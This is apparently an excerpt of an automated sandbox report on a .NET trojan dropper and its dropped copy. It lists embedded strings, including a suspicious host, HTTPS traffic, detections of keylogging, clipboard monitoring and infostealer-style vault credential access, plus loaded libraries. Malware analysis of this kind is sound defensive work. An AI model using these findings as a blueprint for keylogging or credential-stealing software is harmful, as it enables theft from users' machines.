                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nl9.nlkoddos.com
                    Source: tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodo
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, tXBTtgndxsp.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1249280177.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000008.00000002.1294893629.0000000002592000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009588000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3692396965.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3710478603.0000000006762000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3712423280.000000000643F000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721192525.0000000009470000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, tXBTtgndxsp.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49711 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, JIcKHs9coGd.cs.Net Code: _3VejqoIK6
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, JIcKHs9coGd.cs.Net Code: _3VejqoIK6
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_04C88D620_2_04C88D62
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_04C88A500_2_04C88A50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_04C83E280_2_04C83E28
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_04C87A090_2_04C87A09
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_04C88AF10_2_04C88AF1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A50EE80_2_06A50EE8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A50EDB0_2_06A50EDB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A5CC480_2_06A5CC48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A53DD00_2_06A53DD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A542080_2_06A54208
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A55A080_2_06A55A08
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A563B80_2_06A563B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 0_2_06A539980_2_06A53998
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_013341C87_2_013341C8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_0133A2E37_2_0133A2E3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_01334A987_2_01334A98
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_01333E807_2_01333E80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_0133DE907_2_0133DE90
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C0B3AC7_2_06C0B3AC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C010187_2_06C01018
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C031507_2_06C03150
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C041707_2_06C04170
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C059007_2_06C05900
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C0D5F67_2_06C0D5F6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C052207_2_06C05220
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C038677_2_06C03867
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C0C9027_2_06C0C902
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_06C0C9087_2_06C0C908
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_072F00407_2_072F0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_072F64277_2_072F6427
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 7_2_072F64387_2_072F6438
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_00848A508_2_00848A50
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_00848D628_2_00848D62
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_00847A0A8_2_00847A0A
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_00843E288_2_00843E28
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_00848AF18_2_00848AF1
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A645578_2_04A64557
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A697B88_2_04A697B8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A629608_2_04A62960
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A629518_2_04A62951
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A697A88_2_04A697A8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_04A61FA08_2_04A61FA0
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_06740EE88_2_06740EE8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_06740EDB8_2_06740EDB
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_06743DD08_2_06743DD0
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_067442088_2_06744208
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_06745A088_2_06745A08
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_0674BAA98_2_0674BAA9
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_067463B88_2_067463B8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 8_2_067439988_2_06743998
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_010141C820_2_010141C8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0101A2E820_2_0101A2E8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_01019A5820_2_01019A58
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_01014A9820_2_01014A98
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_01013E8020_2_01013E80
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0101DEB820_2_0101DEB8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_067196C820_2_067196C8
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671030820_2_06710308
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671B3AC20_2_0671B3AC
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671417020_2_06714170
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671315020_2_06713150
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671590020_2_06715900
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671D5F720_2_0671D5F7
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671522020_2_06715220
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671B3A020_2_0671B3A0
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671387820_2_06713878
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671C8E120_2_0671C8E1
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0671C90820_2_0671C908
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_06C6642720_2_06C66427
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_06C6643820_2_06C66438
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_06C6004020_2_06C60040
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0101A2E320_2_0101A2E3
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 20_2_0101DE9020_2_0101DE90
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: invalid certificate
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1254618903.0000000006D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9434dd39-8940-44b4-b35d-0c58cf3fe533.exe4 vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1249280177.00000000027B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9434dd39-8940-44b4-b35d-0c58cf3fe533.exe4 vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000002.1246130628.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000000.00000000.1219663601.0000000000512000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIIly.exeX vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3690741810.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeBinary or memory string: OriginalFilenameIIly.exeX vs SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
